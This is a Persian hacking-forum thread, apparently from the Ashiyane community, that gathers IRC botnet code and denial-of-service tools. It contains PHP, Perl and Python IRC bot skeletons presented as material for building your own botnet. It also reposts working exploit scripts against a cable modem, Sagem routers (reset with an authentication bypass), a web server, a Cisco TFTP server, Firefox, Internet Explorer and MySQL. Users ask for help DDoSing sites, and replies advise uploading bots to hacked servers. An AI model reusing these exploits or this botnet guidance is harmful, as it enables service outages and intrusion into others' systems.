print $socket "JOIN $chanel\r\n";
while (my $body = <$socket>) {
chop $body;
if ($body =~ /^PING(.*)$/i) { print $socket "PONG $1\r\n"; }
if ($body =~ /^.*!version(.*)$/i) { print $socket ("PRIVMSG $chanel Cair3x'Bot-Test'For'Ashiyane\r\n"); }
if ($body =~ /^.*!killmaself(.*)$/i) { print $socket ("QUIT\r\n"); }
if ($body =~ /^.*!op(.*)$/i) { print $socket ("MODE $chanel op $saime\r\n"); }
if ($body =~ /^.*!owner(.*)$/i) { print $socket ("PRIVMSG $chanel By:Cair3x'IN'Ashiyane'Digital'Security'Team\r\n"); }
}


کد رو Save کنید با پسوند .pl بعد به یه Chanel برید تو IRC ! بعدش اطلاعات Chanel رو به اسکریپت بدید و اونم اجرا کنید !

پارامتر های ورودی هم
!version = ورژن رو مشخص میکنه !

!killmaself = شما رو دیسکانکت میکنه از روم !

!owner = در مورد برنامه میگه !

اگه دوستان نتونستند کار کنن بگن تا فیلم بسازم ! البته چیز خاصی نیست فقط واسه اشنایی با برنامه نویسی IRC هست !

سلام دوستان !

شاید دوستانی که تازه با IRC شروع به کار کردن زیاد با دستوراتش اشنایی نداشته باشن !

به همین دلیل یه سری از دستورات IRc رو براتون میزارم تا بتونید بهتر کار کنید !



/! Recalls the last command typed in any window.
/action {action text} Sends the specifed action to the active channel or query window.
/add [-apuce] {filename.ini} Loads aliases, popups, users, commands, and events.
/ame {action text} Sends the specifed action to all channels which you are currently on.
/amsg {text} Sends the specifed message to all channels which you are currently on.
/auser {level} {nick|address} Adds a user with the specified access level to the remote users
list.
/auto [on|off|nickname|address] Toggles auto-opping of a nick or address or sets it on or off
totally.
/away {away message} Sets you away leave a message explaining that you are not currently paying
attention to IRC.
/away Sets you being back.
/ban [#channel] {nickname} [type] Bans the specified nick from the curent or given channel.
/beep {number} {delay} Locally beeps 'number' times with 'delay' in between the beeps. /channel
Pops up the channel central window (only works in a channel).
/clear Clears the entire scrollback buffer of the current window.
/ctcp {nickname} {ping|finger|version|time|userinfo|clientinfo} Does the given ctcp request on
nickname.
/closemsg {nickname} Closes the query window you have open to the specified nick.
/creq [ask | auto | ignore] Sets your DCC 'On Chat request' settings in DCC/Options.
/dcc send {nickname} {file1} {file2} {file3} ... {fileN} Sends the specified files to nick.
/dcc chat {nickname} Opens a dcc window and sends a dcc chat request to nickname.
/describe {#channel} {action text} Sends the specifed action to the specified channel window.
/dde [-r] {service} {topic} {item} [data] Allows DDE control between mIRC and other
applications.
/ddeserver [on [service name] | off] To turn on the DDE server mode, eventually with a given
service name.
/disable {#groupname} De-activates a group of commands or events.
/disconnect Forces a hard and immediate disconnect from your IRC server. Use it with care.
/dlevel {level} Changes the default user level in the remote section.
/dns {nickname | IP address | IP name} Uses your providers DNS to resolve an IP address.
/echo [nickname|#channel|status] {text} Displays the given text only to YOU on the given place
in color N.
/enable {#groupname} Activates a group of commands or events.
/events [on|off] Shows the remote events status or sets it to listening or not.
/exit Forces mIRC to closedown and exit.
/finger Does a finger on a users address.
/flood [{numberoflines} {seconds} {pausetime}] Sets a crude flood control method.
/fsend [on|off] Shows fsends status and allows you to turn dcc fast send on or off.
/fserve {nickname} {maxgets} {homedirectory} [welcome text file] Opens a fileserver.
/guser {level} {nick} [type] Adds the user to the user list with the specified level and
address type.
/help {keyword} Brings up the Basic IRC Commands section in the mIRC help file.
/ignore [on|off|nickname|address] Toggles ignoring of a nick or address or sets it on or off
totally.
/invite {nickname} {#channel} Invites another user to a channel.
/join {#channel} Makes you join the specified channel.
/kick {#channel} {nickname} Kicks nickname off a given channel.
/list [#string] [-min #] [-max #] Lists all currently available channels, evt. filtering for
parameters.
/log [on|off] Shows the logging status or sets it on or off for the current window.
/me {action text} Sends the specifed action to the active channel or query window.
/mode {#channel|nickname} [[+|-]modechars [parameters]] Sets channel or user modes.
/msg {nickname} {message} Send a private message to this user without opening a query window.
/names {#channel} Shows the nicks of all people on the given channel.
/nick {new nickname} Changes your nickname to whatever you like.
/notice {nick} {message} Send the specified notice message to the nick.
/notify [on|off|nickname] Toggles notifying you of a nick on IRC or sets it on or off totally.
/onotice [#channel] {message} Send the specified notice message to all channel ops.
/omsg [#channel] {message} Send the specified message to all ops on a channel.
/part {#channel} Makes you leave the specified channel.
/partall Makes you leave all channels you are on.
/ping {server address} Pings the given server. NOT a nickname.
/play [-c] {filename} [delay] Allows you to send text files to a window.
/pop {delay} [#channel] {nickname} Performs a randomly delayed +o on a not already opped nick.
/protect [on|off|nickname|address] Toggles protection of a nick or address or sets it on or off
totally.
/query {nickname} {message} Open a query window to this user and send them the private message.
/quit [reason] Disconnect you from IRC with the optional byebye message.
/raw {raw command} Sends any raw command you supply directly to the server. Use it with care!!
/remote [on|off] Shows the remote commands status or sets it to listening or not.
/rlevel {access level} Removes all users from the remote users list with the specified access
level.
/run {c:\path\program.exe} [parameters] Runs the specified program, evt. with parameters.
/ruser {nick[!]|address} [type] Removes the user from the remote users list.
/save {filename.ini} Saves remote sections into a specified INI file.
/say {text} Says whatever you want to the active window.
/server [server address [port] [password]] Reconnects to the previous server or a newly
specified one.
/sound [nickname|#channel] {filename.wav} {action text} Sends an action and a fitting sound.
/speak {text} Uses the external text to speech program Monologue to speak up the text.
/sreq [ask | auto | ignore] Sets your DCC 'On Send request' settings in DCC/Options.
/time Tells you the time on the server you use.
/timer[N] {repetitions} {interval in seconds} {command} [| {more commands}] Activates a timer.
/topic {#channel} {newtopic} Changes the topic for the specified channel.
/ulist [{|}]{level} Lists all users in the remote list with the specified access levels.
/url [-d] Opens the URL windows that allows you to surf the www parallel to IRC.
/uwho [nick] Pops up the user central with information about the specified user.
/who {#channel} Shows the nicks of all people on the given channel.
/who {*address.string*} Shows all people on IRC with a matching address.
/whois {nickname} Shows information about someone in the status window.
/whowas {nickname} Shows information about someone who -just- left IRC.
/wavplay {c:\path\sound.wav} Locally plays the specified wave file.
/write [-cidl] {filename} [text] To write the specified text to a .txt file.

اینم یک اسکریپ دیگه برای دوستان که پورت 80 مشغول می کنه و باعث از کار افتادن انجمن ساز vBulletin میشه
به زبان پرل
برای ورژن vBulletin 3.8.2

سلام دوستان !

شما اگه دوست دارید برای خودتون به سلیقه خودتون Botnet بنویسید میتونید از این پست و 2 پست بالا تر ایده بگیرید !
در این پست نحوه کار کردن با کانال های IRC رو در زبان PHP قرار میدم !

که شما میتونید در زبان های مختلف و برای همه سیستم عامل این کار رو انجام بدید !

نحوه وصل شدن به کانال های IRC و کار کردن با اون به زبان PHP !


<?
$owner = "r0ot[x0rg]";
$host="208.43.80.173";
$ihost="irc.krstarica.com";
$port="6667";
$nick="[DDOS]-".(rand()%1000);
$ident= "Gost";
$chan="#r0ot";
$realname = "BIK - Pricaonica Internet Krstarice";

set_time_limit(0);

$fp = fsockopen($host, $port, $erno, $errstr, 30);

if ($fp) {
fwrite($fp, "USER ".$ident."@".$ihost." bla bla :".$realname."\r\n");
fwrite($fp, "NICK ".$nick."\r\n");


while(!feof($fp))
{
$line = fgets($fp, 65535);

if(substr($line, 0, 6) == "PING :")
{
//echo "$line\n";
fwrite($fp, "PONG :".substr($line, 6)."\n\r");
}
flush();

//krstaricina 'rutinska kontrola'
$sablon = "ELTO";

if (strpos($line, $sablon) !== false)
{
//echo "$line \n";
list($batali, $potreban) = explode("=", $line);
$potreban = trim($potreban);
list($broj) = explode(" ", $potreban);
$broj = trim($broj);
//echo "broj -> $broj \n";

$rand = (rand(100, 999));
//echo "rand-> $rand\n";
$odgovor = $rand.'2'.((($rand*512) ^ $rand ^ ($broj*3)) & 0x0FFFF);
fwrite($fp, "PRIVMSG ".$nick." :$odgovor\r\n");

//echo "odgovor -> $odgovor\n";
fwrite($fp, "JOIN :".$chan."\r\n");
}
//

//Globalno parsiranje poruka
//Provera ownera i komandi
$provera = "PRIVMSG";
if(strpos($line, $provera) !== false)
{
list($kom1,$kom2) = explode("!", $line);
$duzina = strlen($owner);
$kom1 = trim(substr($kom1, -$duzina));
if($kom1 == $owner)
{
$provera2 = ":";
if(strpos($kom2, $provera2) !== false)
{
list($temp, $komanda) = explode(":", $kom2);
$komanda = trim($komanda);

//izvrsavanje komandi
if(strpos($komanda, "-say") !== false)
{
list($prom,$izvrsi) = explode("-say", $line);
$izvrsi = trim($izvrsi);
//echo "$line\n";
fwrite($fp, "PRIVMSG ".$chan." :".$izvrsi."\r\n");
}
}
}
}
//
}
fclose($fp);
}


?>

سلام دوستان !

در این پست شما نحوه کار با کانال های IRC رو در زبان برنامه نویسی python یاد میگیرید !


#!/usr/bin/env python

import socket, re, threading, thread, time, random
class IRC (object):
def __init__(self):
self.ip = "irc........com"
self.port = 6667
self.chan = "#test"
self.nick = "PXD"+str(random.randint(100000,999999))
self.symbol = '>'
self.owner = "owner"
self.host = "host.com"
def IRC_Connect(self):
time.sleep(3)
print ("Connecting...")
try:
self.irc_sock = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
except:
print("[SK]FATAL: Could not create connection socket...")
self.IRC_Connect()
if not self.ip:
print("[SK]FATAL: IP (ip) setting not found...")
self.IRC_Connect()
if not self.port:
print("[SK]FATAL: Port (port) setting not found...")
self.IRC_Connect()
try:
self.irc_sock.connect ((self.ip, int(self.port)))
except:
print("[SK]FATAL: Could not connect to IRC...")
self.IRC_Connect()
self.IRC_Start()
def IRC_Start(self):
self.irc_sock.send (( "NICK %s \r\n") % (self.nick))
self.irc_sock.send (( "USER %s 8 * :X\r\n" ) % (self.nick))
self.irc_sock.send (( "JOIN %s \r\n" ) % (self.chan))
self.IRC_MainLoop()
def IRC_MainLoop(self):
try:
while True:
self.recv = self.irc_sock.recv( 4096 )
if self.recv.find ( 'PING' ) != -1:
self.irc_sock.send(( "PONG %s \r\n" ) % (self.recv.split() [ 1 ]))
if self.recv.find('PRIVMSG') != -1:
thread.start_new_thread(self.IRC_Parse, ())
except Exception, e:
print e
self.IRC_Connect()
def IRC_Parse(self):
self.irc_nick = self.recv.split ( '!' ) [ 0 ] . replace ( ':', '' )
self.irc_host = self.recv.split ( '@' ) [ 1 ] . split ( ' ' ) [ 0 ]
self.irc_message = ':'.join ( self.recv.split ( ':' ) [ 2: ] ) . replace( '\r\n', '' )
print "NewThread"
print ( "%s %s %s" ) % (self.irc_nick, self.irc_host, self.irc_message)
if re.compile('^'+self.symbol).match(self.irc_message ) and self.irc_host == self.host and self.irc_nick == self.owner:
self.query = self.symbol.join(self.irc_message.split(self.symbo l)[1:]).split(" ")
print self.query
irc = IRC()
irc.IRC_Connect()

#!/usr/bin/python
# Title: RCA DCM425 Cable Modem micro_[Only registered and activated users can see links] DoS/PoC
# Date: 02/27/10
# Author: ad0nis
# Info: This script causes a Denial of Service on a DCM425 cable modem.
# Sending 1040 bytes causes a reboot of the device after a few seconds
# of it freezing up. I believe this may lead to remote code execution
# but I did not bother to test it further.

# By default, this cable modem has an IP address of 192.168.100.1

# There are two different but similar models of this router, the only
# difference I see between them is that one has an On/Off button on the
# front. The one I discovered this on is the one without a button. I
# have not tested this on the other model.

# Thanks to ShadowHatesYou for the inspiration to look closer at the
# little black box on my network.

import sys, socket
target = sys.argv[1]
buffer = ( "\x41" * 1040 )
print "Sending 1040 A's to" ,target, "on port 80\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,80))
s.send(buffer)
s.close()

Sagem Routers Remote Reset Exploit

#!/usr/bin/perl
# Exploit Title: Sagem routers Remote Reset Exploit
# Date: 04/03/2010
# Author: AlpHaNiX
# Software Link: null
# Version: Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404
# Tested on: Sagem F@ST 2404


# Code :

use [Only registered and activated users can see links]
use [Only registered and activated users can see links]
use LWP::UserAgent;
system('cls');
if (@ARGV != 1) { header();help(); exit(); }
else{
if ($ARGV[0] =~ /[Only registered and activated users can see links] ) { $ipz = $ARGV[0]."/"; } else { $ipz = "[Only registered and activated users can see links]".$ARGV[0]."/";$ip=$ARGV[0] }
header();
print "[+] Working on $ip ..\n\n";
exploit();
sub help()
{
print "\n[X] the target must be sagem rooter main ip adress\n".
"[X] affected Versions : Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404)\n".
"[X] Usage : perl $0 target \n".
"[X] Example : ./exploit.pl<[Only registered and activated users can see links]> 192.168.1.1 \n";
}
sub header()
{
print "\n[+]====================================[+]\n".
"[+] Sagem routers Remote Reset Exploit [+]\n".
"[+] Found And Exploit By AlpHaNiX [+]\n".
"[+] Contact : AlpHa[at]Hacker[dot]Bz [+]\n".
"[+] HomePage : NullArea.Net [+]\n".
"[+]====================================[+]\n\n\n"
}
sub exploit()
{
my $target = $ipz."restoreinfo.cgi" ;
my $request = [Only registered and activated users can see links]>new(GET=>$target);
my $useragent = LWP::UserAgent->new();
my $response = $useragent->request($request);
if($response->content =~ m/<HTML><HEAD><TITLE>401 Unauthorized<\/TITLE><\/HEAD>/i && $response->content =~ m/<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized<\/H4>/ && $response->content =~ m/<ADDRESS><A HREF="[Only registered and activated users can see links]>\/software\/micro_[Only registered and activated users can see links]">micro_[Only registered and activated users can see links]><\/ADDRESS>/ )
{
print "[+] Authentication bypassed !\n" ;
print "[+] Exploited , $ip is restored" ;
}
else
{
print "[+] Please make sure you entered real sagem router ip\n" ;
}
}


}

Google Chrome v4.0.249 XML Denial of Service PoC

Stack Overflow caused by long malformed string inside XML Tags

Tested on Windows 7 64bit
Chrome will through up the "Aw, Snap!"

Mozilla Firefox is a popular internet browser. .....:)

#Vulnerability
This bug is a typical result of multitudinous loop.
The flaw exists when the attacker put window.printer() funtion
in multitudinous loop.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.


#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.



#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox

0261.html


<html>
<title>asheesh kumar mani tripathi</title>

**********


function
asheesh()
{
window.onerror=new Function("history.go(0)");
window.print();
asheesh();


}
asheesh();
</script>

</html>

این رو دوست خوبمون Nitrojen26 نوشته
بعد از اجرا شدن بسیار سریع cpu usage بالا میره (ریموت )
اسکریپ بسیار قوی و پرایویتی است :o
که به زبان پرل

اینم یه نرم افزار تحت پرل برای حملات تکذیب سرور


فایل مورد نظر پیوست شد

سلام
من یه وی پی اس دارم حدود سه ، چهار روزه بهم حمله دیداس میشه :ii
اونم از نوع بوت نت !
رم پر میشه ، دیتابس ها ارور میدند ، در نتیجه سرور داون میشه
الان یه ای پی دیگه بلوک شد :D
به یک سایت روز وی پی اس حمله میشه
باید چیکار کنم ، راهی هست جلوشو بگیرم :(
چطوری باید تعداد کانکشن ها رو محدود کنم؟
تا 400 تا رکورد داره thumbsup
منتظرم...

ای کاش یه ذره میگشتید ... راه های مختلفی وجود داره به تعداد member های آشیانه راه هست برای جلوگیری از این نوع حملات. مثلا یه راهش اینه که اسکریبت جلوگیری از این حملات رو بذارید. این اسکریبت به مقدار بسیار زیاد در آشیانه هست! بگردید!

ای کاش یه ذره میگشتید ... راه های مختلفی وجود داره به تعداد member های آشیانه راه هست برای جلوگیری از این نوع حملات. مثلا یه راهش اینه که اسکریبت جلوگیری از این حملات رو بذارید. این اسکریبت به مقدار بسیار زیاد در آشیانه هست! بگردید!

گشتم ، نصب هم کردم حمله بد تر شد !
کلی ای پی بلوک شده اما حمله تموم نشد :o

سلام من میخوام سایتی را دیداس کنم بهم گفتن یه چیزی مثل اسکریپت هست میتونین بهم بدین یا برام نصب کنید

#!/usr/bin/perl
#
# Program : [Only registered and activated users can see links] v1.5.3
# PoC : Remote Break Services
# Homepage : [Only registered and activated users can see links]
# Found by : Jonathan Salwan
# This Advisory : Jonathan Salwan
# Contact : [Only registered and activated users can see links]
#
#
# //----- Application description
#
# Single-process [Only registered and activated users can see links] server; no threads or processes started per connection, runs
# with only few threads. Includes directory listing, virtual hosting, basic auth., support
# for PHP, Perl, Python, SSI, etc. All settings in one config/script file.
#
#
# //----- Description of vulnerability
#
# The vulnerability is caused due to an input validation error when processing HTTP requests. This can be
# exploited to break all services http & ftp.
#
#
#
# //----- Credits
#
#
#


use IO::Socket;
print "\n[x][Only registered and activated users can see links] v1.5.3 - Remote Break Services\n";

if (@ARGV < 1)
{
print "[-] Usage: <file.pl> <host> <port>\n";
print "[-] Exemple: file.pl 127.0.0.1 80\n";
exit;
}

$ip = $ARGV[0];
$port = $ARGV[1];


$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connecting: Failed!\n";

print "[+] Sending request: GET /res~[Only registered and activated users can see links] [Only registered and activated users can see links] $ip\\r\\n\\r\\n";
$msg = "GET /res~[Only registered and activated users can see links] [Only registered and activated users can see links] $ip\r\n\r\n";
$socket->send($msg);

print "\n[+] Done.\n\n";

close($socket);

[Only registered and activated users can see links]

لطفا راجع به کاربردشم توضیح بدین

ببخشید اگه ممکنه اون قسمت آپلود کردن اسکریپت رو بات نتمون رو بیشتر توضیح بدید که تو چه سایتی باید آپ کنیم و چه جوری رو بات بذاریم؟

کسی نیست جواب ما رو بده؟

کسی نمیخواد توضیح بده؟؟؟؟؟؟؟؟؟؟؟؟؟

داداش لینک رو یه چک بکن.

کسی نمی تونه جواب منو بده؟؟

عزیز چیزه خاصی نداره ! فقط شما باید اسکریپت رو رو سایتی که هک کردید اپلود کنید همین !

میتونید از برنامه نوشته شده در همین راستا هم استفاده کنید !

Cisco TFTP Server 1.1 DoS


# Exploit Title: [Cisco TFTP Server 1.1]
# Date: [2010-03-25]
# Author: [_SuBz3r0_]
# Software Link: [[Only registered and activated users can see links]]
# Version: [1.1]
# Tested on: [XP SP3,Win2k3]
# CVE : [if exists]
# Code :
#Cisco TFTP Server v1.1 DoS
print ""
print "##############################################"
print "# _SuBz3r0_ #"
print "##############################################"
print ""
print "Cisco TFTP v1.1 Remote DoS"
print "Just For Fun"
print "tftp_fuzz.py [ip of server]"
print ""
print "Greetz:piloo le canari & MaX"
print "Credits to Ilja van Sprundel"
print "Tested on: French Windows Xp Sp3 fully Patched"
print ""

#!/usr/bin/python
# tftpd fuzzer by Ilja van Sprundel
# implements rfc 1350, 2090, 2347, 2348, 2349
#
# todo: - 1 option per packet
# - lots (>100) (small) options per packet
# - add better option support to OACK
# - client fuzzing ?
import os, socket, sys, struct, random
port = 69
type = ["netascii", "octet", "binary", "mail"]
asize = ["blkzise", "tsize"]
class fuzz:
def __init__(self):
""" """
def randstring(self, len):
thestring = ""
what = random.randint(0,5)
if what < 5:
for i in range(len):
char = chr(random.randint(1,255))
thestring += char
else:
thestring = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
return thestring

def randbin(self, len):
thestring = ""
for i in range(len):
char = chr(random.randint(0,255))
thestring += char
return thestring

def fuzz_rw(self):
""" """
data = ""
if not random.randint(0,50):
return ""
if not random.randint(0,10):
if random.randint(0,1):
data = "../"
else:
howmany = random.randint(1,100)
data = "../" * howmany

data += self.randstring(random.randint(0,3000))
# no 0byte
if not random.randint(0,10):
return data
data += "\0"
# no mode
if not random.randint(0,100):
return data

if random.randint(0,5):
data += random.choice(type)
else:
data += self.randstring(random.randint(0,3000))

if not random.randint(0,10):
return data
data += "\0"
if not random.randint(0,10):
return data
options = random.randint(0,100)
if not random.randint(0,10):
breakloop = 1
breakit = random.randint(0, options)
else:
breakloop = 0
longarg = random.randint(0, options)
if not random.randint(0,10):
lowlimit = 16
options = options / 4
else:
lowlimit = 0
for i in range(options):
which = random.randint(lowlimit, 19)
if which < 16:
if longarg == i:
data += self.randstring(random.randint(0,3000))
else:
data += self.randstring(random.randint(0,100))
data += "\0"
data += self.randstring(random.randint(0,100))
if which == 16:
data += "multicast\0"
if not random.randint(0,5):
if random.randint(0,1):
data += self.randstring(random.randint(0,50))
else:
data += str(random.randint(0, 0xffffffff))
if which == 17 or which == 18:
data += random.choice(asize) + "\0"
if random.randint(0,10):
if random.randint(0,1):
uplimit = 65535
else:
uplimit = 0xffffffff
string = str(random.randint(0, uplimit))
if random.randint(0,1):
data += "-"
data += string
else:
data += self.randstring(random.randint(0,50))
if which == 19:
data += "timeout\0"
if random.randint(0,10):
which = random.randint(0,5)
if which < 4:
uplimit = 255
if which == 4:
uplimit = 65535
else:
uplimit = 0xffffffff
string = str(random.randint(0, uplimit))
if random.randint(0,1):
data += "-"
data += string
else:
data += self.randstring(random.randint(0,50))

if breakloop:
if i == breakit:
return data
data += "\0"


return data

def make_data(self):
""" """
which = random.randint(0,10)
if which < 6:
# read is more likely to be accepted then write
# hence we bias it towards reading !
if random.randint(0,2):
d = "\x00\x01"
else:
d = "\x00\x02"
d += self.fuzz_rw()
# do some tftpd's do something with this ???
elif which == 6:
d = "\x00\x03"
d += self.randbin(2)
d += self.randbin(random.randint(0,3000))
elif which == 7:
d = "\x00\x04"
d += self.randbin(2)
if not random.randint(0,10):
d += self.randbin(random.randint(0,3000))
elif which == 8:
d = "\x00\x05"
d += self.randbin(2)
d += self.randstring(random.randint(0,1000))
if random.randint(0,10):
d += "\0"
elif which == 9:
# lets do this later ....
d = "\x00\x06"
d += self.randbin(1000)
else:
if random.randint(0,2):
times = 512
else:
times = random.randint(512, 10000)
d = self.randbin(random.randint(0,times))
return d

def run(self):
""" """
packets = 0
try:
while 1:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
da = self.make_data()
s.sendto(da, (host, port))
s.close()
os.write(1,".")
packets += 1
except KeyboardInterrupt:
print "\nPackets: " + str(packets)

if __name__ == '__main__':
if len(sys.argv) <= 1:
sys.exit(0)
host = sys.argv[1]
if len(sys.argv) >= 3:
port = sys.argv[2]
f = fuzz()
f.run()

سلام
برادر من همه کارها رو انجام دادم فقط یه جا موندم
127.0.0.1 من این رو زدم تا نشون بده فایلها رو اصلا نیومد صفحه
میشه در مورد اونجا توضیح بدین؟
و یه چیز دیگه
تو تنظیمات اولیه اون ای پی که وارد کردین؟ ای پی خودتون هست؟ یعنی باید ای پی خودمون رو اونجا بزنیم؟

سلام
برادر من همه کارها رو انجام دادم فقط یه جا موندم
شما تو شل از درایو سی چی کار میکنید؟
127.0.0.1 من این رو زدم تا نشون بده فایلها رو اصلا نیومد صفحه
میشه در مورد اونجا توضیح بدین؟
با اجازه علی آقا
شما باید قبلش برنامه easyphp رو نصب کنی و رانش کنی وگرنه هیچ صفحه ای توی localhost برات باز نمیشه ...
اگه درست بگم ایشون خودشون هم زامبی میشن

یه سوال دیگه داشتم
من هم تو درایو کد رو انداختم و هم شل هر دو رو هم زدم
ولی بعد از مدتی فایل اجرا میشه و تو برنامه میره
یعنی مثلا وقتی به 127.0.0.1 میرم و رو فایل کلیک میکنم بعد یه دقیقه اون فایل اجرا میشه و اون نوشته ای که تو برنامه اومده میره و هیچ کاری نمیشه کرد
اونو باید چی کار کنم؟

عزیز من واسه اینکه خودم رو درگیر سرور ها نکنم ! سیستم خودم رو به عنوان سرور معرفی کردم و زامبی شدم ! شما اصلا نیازی نیست که این کارا رو انجام بدید ! فقط از طریق سرور های هک شده کار کنید !/

linka kharaban

با اجازه ruby عزیز

[Only registered and activated users can see links]

سلام.
لطفا اگه کسی میدونه به من بگه که اصلا دی داس چی هست؟
ممنون می شم اگه بگید...

Microsoft Internet Explorer Tabular Data Control ActiveX Remote Code Execution Vulnerability

<!--
.text:600058F7 and [ebp+pv], 0
.text:600058FE lea eax, [ebp+pv]
.text:60005904 push eax ; unsigned __int16 **
.text:60005905 push dword ptr [ebx+10h] ; struct IOleClientSite *
.text:60005908 call GetHostURL(IOleClientSite *,ushort * *)
.text:6000590D mov eax, [ebp+var_218]
.text:60005913 push [ebp+pv] ; pv
.text:60005919 mov [ebp+eax+var_204], 0
.text:60005921 mov eax, [ebp+var_21C] ; length of the DataURL param
.text:60005927 mov [ebp+eax+var_104], 0 ; write one byte to arbitrary stack address
-->
<html>
<title>Trigger for ZDI-10-034 by ZSploit.com</title>
<head>
</head>
<body>
<object classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">
<param name="DataURL" value="[Only registered and activated users can see links] sploitzsploitzsploitzsploitzsploitzsploitzsploitzs ploitzsploitzsploitzsploitzsploitzsploitzsploitzsp loitzsploitzsploitzsploitzsploitzsploitzsploitzspl oitzsploitzsploitzsploitzsploitzsploitzsploitzsplo itzsploi"/>
</object>
</body>
</html>

# Tiamat - IRC Bot v.0.1 by BlackLight
# copyleft 2008, released under GNU GPL licence v.3.0
#
# Usage: perl bot.pl <irc server> <channel>
# Default irc server: blacklight.gotdns.org
# Default channel: #blacklight
# Use it as IRC operator!
# Functionality:
# * It can give +o mode to a nick, if present in his $bot_oplist file
# To get a +o mode when the bot is connected:
# /msg <bot_name> ~opme <op_pass>
# In $bot_oplist file there must be a list of possible channel OPs made
# this way:
# opnick1 oppass1
# opnick2 oppass2
# ... ...
# * It has a little (and useless XD) anticurse ****** on, that kicks the user
# if he curses
# * It has a little 133t translator on. To use it
# ~133t <text to translate>
# * It logs anything on the channel on which he is present to a log file
# * More options coming soon ^^
#!/usr/bin/perl
use Net::IRC;
my $bot_nick='Tiamat';
my $bot_log='irc.log';
my $bot_oplist='./oplist';
my $bot_oppass='*** Here your bot OP password ***';
sub on_public {
my ($conn,$event) = @_;
my $chan=$event->{to}[0];
my $nick=$event->{nick};
my $text=$event->{args}[0];
my $mynick=$bot_nick;
my $log=$bot_log;
open OUT,">> $log";
print OUT "$nick: $text\n";
close OUT;
if ($text =~ /$mynick/) {
$conn->privmsg($conn->{channel}, "$nick don't speak to me, I'm just a bot...");
}
if (($text =~ /dio/i && $text =~ /porco/i) || ($text =~ /dio/i && $text =~ /cane/i)) {
$conn->privmsg($conn->{channel}, "Anticurse ****** ON -> $nick kicked");
$conn->kick($chan,$nick);
}
if ($text =~ /^~133t\s(.*)/) {
$msg=$1;
$msg =~ tr/aelos/43105/;
$conn->privmsg($conn->{channel}, "133t, $nick: $msg");
}
}
sub on_msg {
my ($conn, $event) = @_;
my $nick=$event->{nick};
my $chan=$conn->{channel};
my $text=$event->{args}[0];
if ($text =~ /^~opme\s(.*)/) {
my $mypwd=$1;
open IN,"< $bot_oplist";
my $opped=0;
while (<IN>) {
my $line=$_;
my ($op,$pwd) = split /\s/,$line;
if ($nick =~ /^$op$/ && $mypwd =~ /^$pwd$/) {
$conn->mode($chan,'+o',$nick);
$opped=1;
last;
}
}
close IN;
if (!$opped) {
$conn->privmsg($conn->{channel}, "$nick you're not in my OPLIST...sorry dude...");
}
}
}
my $irc = new Net::IRC;
my $sock = $irc->newconn(
Server => shift || 'blacklight.gotdns.org',
Port => 6667,
Nick => $bot_nick,
Ircname => "~~BlackLight's bot~~",
Username => $bot_nick
) or die "CONN\n";
$sock->{channel} = shift || '#blacklight';
$sock->add_handler('public', \&on_public);
$sock->add_handler('msg', \&on_msg);
$sock->oper($bot_nick,$bot_oppass);
$sock->join($sock->{channel});
$sock->mode($sock->{channel},'+o',$bot_nick);
$sock->privmsg($sock->{channel}, 'Greetz to '.$sock->{channel}." by BlackLight's bot");
$irc->start;

#include <stdlib.h>
#include <stdio.h>

#define USE_OLD_FUNCTIONS
#include <mysql/mysql.h>

#define NullS (char *) 0

int
main (int argc, char **argv)
{
MYSQL *mysql = NULL;

mysql = mysql_init (mysql);

if (!mysql)
{
puts ("Init faild, out of memory?");
return EXIT_FAILURE;
}

if (!mysql_real_connect (mysql, /* MYSQL structure to use */
"localhost", /* server hostname or IP address */
"monty", /* mysql user */
"montypython", /* password */
NULL, /* default database to use, NULL
for none */
0, /* port number, 0 for default */
NULL, /* socket file or named pipe name */
CLIENT_FOUND_ROWS /* connection flags */ ))
{
puts ("Connect failed\n");
}
else
{
puts ("Connect OK\n");
// mysql_create_db(mysql, "%s%s%s%s%s");
simple_command(mysql, COM_CREATE_DB, argv[1], strlen(argv[1]), 0);

}

mysql_close (mysql);

return EXIT_SUCCESS;
}

دروود این برنامه توپ برا ddos خیلی خره برنامش .برید ....:D


بعد از 5 ثانیه که رجیستر شد کار کنید با هاش
[Only registered and activated users can see links]

فکر کنم فیلتر شده سایتش . حجمش زیاد بود نتونستم براتون ضمیمه کنم. شرمنده :x

خود برنامه حجمش 3.90 MB بود 3.45 MB هم یه اهنگ بود کنارش اونم حذف کردم :d دو بار هم فشرده شده بود 2 تا هم پسورد داشت پسورد رو هم حذف کردم. گفتم کاره دوستان رو راحت کنم:) راستی توی فایل فشرده شده Serial Number وجود نداشت.
اهنگش رو بیشتر دوست دارم:x

Serial Number رو هم اگه پیدا کردم میزارم
اینم لینک دانلود از سایت سازنده
[Only registered and activated users can see links]

سلام خدمته عزیزان قرار هست تو این تاپیک ابزار مربوط به dos قرار بگیره که با کمک شما و بنده این تاپیک رو می سازیم!

خوب اینم یکی دیگه .....

سلام دوست من جای این پست هم اینجا نیست مدیرا خودشون درست کنند!
اینم یکی دیگه!

“PyLoris is a tool for testing a web server’s vulnerability to Denial of Service (DoS) attacks. It uses the Slowloris method; by using all available connections web servers cannot complete valid requests. Supports SOCKS, SSL, and all HTTP request methods.”
PyLoris 3.0 requires Python 2.x to run.
There are major changes in this version! This is a very brief change log:
* Tkinter GUI
* Scripting API
* Inteligent Thread & Exception Handling
* Supports options to be pulled from files
* Multiple concurrent attack support
* ScriptLoris class for easy extension and prepackaged attack creation
* libloris module providing attack API
* Highly configurable HTTP connection consuming DoS
* [Only registered and activated users can see links] support
* GET, POST, HEAD and other headers supported
* SOCKS4 and SOCKS5 proxies supported
* Written in Python
* Cross Platform; supported on Windows, Linux, and Mac OS X
* Forging Referer header for severs inaccessible directly
* Gzip encoding to test for CEV-2009-1891 vulnerability
* Many more bug fixes!

